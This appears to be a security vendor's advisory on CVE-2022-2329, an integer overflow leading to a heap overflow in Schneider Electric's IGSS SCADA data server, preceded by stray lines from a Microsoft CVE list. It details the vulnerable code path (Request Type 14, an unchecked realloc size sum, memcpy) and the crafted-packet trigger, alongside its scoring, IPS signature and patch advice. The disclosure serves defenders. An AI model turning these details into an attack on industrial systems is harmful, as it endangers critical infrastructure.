There are no known exploits in the wild.
CVE-2022-41043 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41081 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.

Schneider Electric IGSS Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Schneider Electric’s Interactive Graphical Supervisory Control and Data Acquisition (SCADA) System (IGSS) is used for monitoring and controlling industrial processes. According to the vendor, more than 28,000 IGSS licenses have been sold around the world and IGSS is installed in many different industries, including the Oil and Gas, Traffic Control, and Waste Water industries.

  An integer overflow vulnerability exists in Schneider Electric IGSS. The vulnerability is due to input validation error when processing ALMNOTE opcode.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted packet to the target service. Successful exploitation could cause denial-of-service and potentially remote code execution.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-2329.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.5 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability is due to the missing validation of the size field in the request sent to the server. When the data server receives a message, the function IGSSdataServer.exe+0xb30b0() is called, which calls the C library function WSARecv() to retrieve the contents of the message from the socket. Later, in the same function, the code checks that Opcode1 is equal to 1. If false the function exits. If true, the code calls a switch statement on the value of the Request Type field and enters the appropriate path of code execution.

  If the Request Type field is equal to 14, then the code execution enters the potentially vulnerable code path. The code calls function IGSSdataServer+0xf7650(). This function is called using the function pointer which is set only after the first request. Therefore, this function is only called after the second or subsequent request. Inside this function, the code calls the C library function realloc() with the size parameter in this function set to the (size field from the previous request + size field from the current request). This function does not perform validation on the computed value of the vulnerable addition operation of the size fields in the previous request and in the current request.

  Next, the code calls the C library function memcpy() to copy the “note” data field from the current request to the new buffer using the new reallocated heap buffer which maybe be smaller than intended due to integer overflow. The code keeps track of the value of the size field from the previous request in another heap buffer. Then, the code copies the “note” data in the current request to the new reallocated buffer. Since this new buffer size can be too small to fit the length of the “note” data field in the request, due to earlier integer overflow, a heap-buffer overflow can ensue.

  IGSS Data Server

Triggering the Problem:

  • The target must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the server running the vulnerable product.

Triggering Conditions:

  A remote attacker sends three crafted packets with Request Type set to 14. The vulnerability is triggered when the affected product parses the malicious requests.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • 7-Technologies (7T) IGSS Protocol

  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 3304 Schneider Electric IGSS Integer Overflow

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Apply the vendor supplied patch to eliminate the vulnerability.
    • Filter attack traffic using the signature above.
  The vendor, Schneider Electric, has released an update and advisory regarding this vulnerability:
  Vendor Advisory